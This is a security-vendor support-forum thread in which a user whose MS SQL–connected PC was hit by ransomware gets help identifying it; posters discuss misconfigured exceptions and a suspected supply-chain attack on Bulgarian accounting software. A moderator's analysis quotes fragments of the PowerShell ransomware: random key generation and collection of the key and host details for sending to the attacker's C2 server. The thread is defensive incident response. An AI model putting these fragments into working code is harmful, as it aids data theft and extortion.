ivaylogrig 0 Posted May 18 Share Posted May 18 Hello, My computer was infected with cyberfear@decryptor. eis_logs.zip Link to comment Share on other sites More sharing options...
Administrators Marcos 5,274 Posted May 19 Administrators Share Posted May 19 First of all, you have misconfigured ESET Internet Security. Attacks were conducted against MS SQL Server running on the machine but you have configured ESET not to block them: Also you have created an exception for 2 IP addresses blocked by ESET, one of which is a known source of attacks: https://www.abuseipdb.com/check/198.147.26.74 The following detections were stemming from a compromised MS SQL server: a variant of MSIL/HackTool.BadPotato.C trojan a variant of Win64/Kryptik.EDF trojan a variant of Win64/Agent.DJU trojan I'd suggest to: 1, Remove all IDS exceptions 2, Supply me with : a) a couple of encrypted files, ideally Office documents b) the ransomware note with payment instructions, if exists Link to comment Share on other sites More sharing options...
ivaylogrig 0 Posted May 19 Author Share Posted May 19 1 hour ago, Marcos said: Първо, вие сте конфигурирали неправилно ESET Internet Security. Бяха извършени атаки срещу MS SQL Server, работещ на машината, но вие сте конфигурирали ESET да не ги блокира: Също така сте създали изключение за 2 IP адреса, блокирани от ESET, единият от които е известен източник на атаки: https://www.abuseipdb.com/check/198.147.26.74 Следните откривания произтичат от компрометиран MS SQL сървър: вариант на MSIL/HackTool.BadPotato.C троянски кон вариант на троянски кон Win64/Kryptik.EDF вариант на троянски кон Win64/Agent.DJU Бих предложил да: 1, Премахнете всички IDS изключения 2, Доставете ми : а) няколко криптирани файла, в идеалния случай Office документи б) бележката за рансъмуер с инструкции за плащане, ако съществува I am attaching some encrypted files and a ransomware note. Infected.zip Link to comment Share on other sites More sharing options...
Administrators Marcos 5,274 Posted May 19 Administrators Share Posted May 19 Unfortunately the files didn't help to determine how files were encrypted. It could have been a ransomware or a legit encryption tool that an adversary ran after gaining access to the machine. Link to comment Share on other sites More sharing options...
ivaylogrig 0 Posted May 19 Author Share Posted May 19 How to clean the machine? Link to comment Share on other sites More sharing options...
Administrators Marcos 5,274 Posted May 19 Administrators Share Posted May 19 Just run a full disk scan to make sure that no malware is detected. You computer should be clean. The ransomware is usually removed itself or the adversary deletes it after encryption. Link to comment Share on other sites More sharing options...
itman 1,748 Posted May 19 Share Posted May 19 (edited) If the files were encrypted with BlackMatter ransomware, it might be possible to decrypt them: https://forum.eset.com/topic/39294-pc-infected-with-cyberfeardecryptor-sexaxglsy-files/?do=findComment&comment=178902 Edited May 19 by itman Link to comment Share on other sites More sharing options...
ivaylogrig 0 Posted May 19 Author Share Posted May 19 1 hour ago, itman said: Ако файловете са криптирани с рансъмуер BlackMatter, може да е възможно да ги дешифрирате: https://forum.eset.com/topic/39294-pc-infected-with-cyberfeardecryptor-sexaxglsy-files/?do=findComment&comment=178902 How do I know this? Link to comment Share on other sites More sharing options...
Administrators Marcos 5,274 Posted May 19 Administrators Share Posted May 19 Normally you could check it via https://id-ransomware.malwarehunterteam.com but in this case the variant is unknown. The files could be encrypted by an attacker running a legitimate encryption tool when connected to your machine. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,274 Posted May 19 Administrators Share Posted May 19 It's a new Powershell malware, will be detected shortly as PowerShell/Filecoder.BM trojan. It was probably a targeted attack since it was not found on any other machine with ESET installed so far. Link to comment Share on other sites More sharing options...
ivaylogrig 0 Posted May 19 Author Share Posted May 19 Yes the attack is targeted, I believe it is happening through a backup program of an accounting program I use. Link to comment Share on other sites More sharing options...
ivaylogrig 0 Posted May 19 Author Share Posted May 19 9 minutes ago, Marcos said: Това е нов злонамерен софтуер Powershell, скоро ще бъде открит като троянски кон PowerShell/Filecoder.BM. Вероятно е била целенасочена атака, тъй като досега не е открита на никоя друга машина с инсталиран ESET. Ще бъдем ли защитени в бъдеще? Link to comment Share on other sites More sharing options...
itman 1,748 Posted May 19 Share Posted May 19 26 minutes ago, Marcos said: It's a new Powershell malware Would have Eset recommended anti-ransomware rule to block any child process startup from PowerShell.exe detected and blocked it? Link to comment Share on other sites More sharing options...
Administrators Marcos 5,274 Posted May 19 Administrators Share Posted May 19 The PowerShell script infects local MS SQL databases by running "sqlcmd -S localhost ..." except 'master', 'tempdb', 'model', 'msdb'. Unfortunately the encryption key is random: $PSRKey = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 24 | % {[char]$_}) and is sent to the attacker's C&C server: $C2Data = @" [>] Key: $PSRKey [>] Hostname: $computer [>] Current User: $domain$user [>] Current Time: $time [>] Local IP: $localIP [>] Public IP: $publicIP "@ $url = "http://$C2Server`:$C2Port/data" Link to comment Share on other sites More sharing options...
itman 1,748 Posted May 19 Share Posted May 19 (edited) Perhaps Mallox ransomware; Quote The attacker created a stored procedure named cmd_exec that calls the SqlShell malware. Finally, it called the stored procedure to execute a command passed in parameter which performs the following actions: Using echo and redirect, it creates a PowerShell script that downloads a binary and saves it to the ProgramData folder; It then calls PowerShell to execute the script; Finally, It uses WMIC to execute the binary. https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ Edited May 19 by itman Link to comment Share on other sites More sharing options...
safety 8 Posted May 20 Share Posted May 20 On 5/19/2024 at 4:20 PM, ivaylogrig said: I am attaching some encrypted files and a ransomware note. Infected.zip Can you upload these files to a cloud drive: Google or Yandex, and provide a link to download and determine the type of ransomware based on the encrypted file and the ransom note? Link to comment Share on other sites More sharing options...
Administrators Marcos 5,274 Posted May 20 Administrators Share Posted May 20 It appears there has been a supply chain attack going on and targeting users of the Bulgarian accounting software Microinvest that uses SQL Express. Link to comment Share on other sites More sharing options...
itman 1,748 Posted May 20 Share Posted May 20 (edited) 3 hours ago, Marcos said: It appears there has been a supply chain attack going on and targeting users of the Bulgarian accounting software Microinvest that uses SQL Express. The beginnings of another infamous Petya-like attack? Quote It was believed that the software update mechanism of M.E.Doc [uk]—a Ukrainian tax preparation program that, according to F-Secure analyst Mikko Hyppönen, "appears to be de facto" among companies doing business in the country—had been compromised to spread the malware.[13][18][19] Analysis by ESET found that a backdoor had been present in the update system for at least six weeks prior to the attack, describing it as a "thoroughly well-planned and well-executed operation".[20] The developers of M.E.Doc denied that they were entirely responsible for the cyberattack, stating that they too were victims.[18][21][22][23] https://en.wikipedia.org/wiki/Petya_(malware_family) Edited May 20 by itman Link to comment Share on other sites More sharing options...
itman 1,748 Posted May 20 Share Posted May 20 Somewhat coincidental is the infamous 2019 Bulgarian Tax Agency hack was SQL injection based: https://www.acunetix.com/blog/web-security-zone/sql-injection-compromises-entire-country/ . Link to comment Share on other sites More sharing options...
Recommended Posts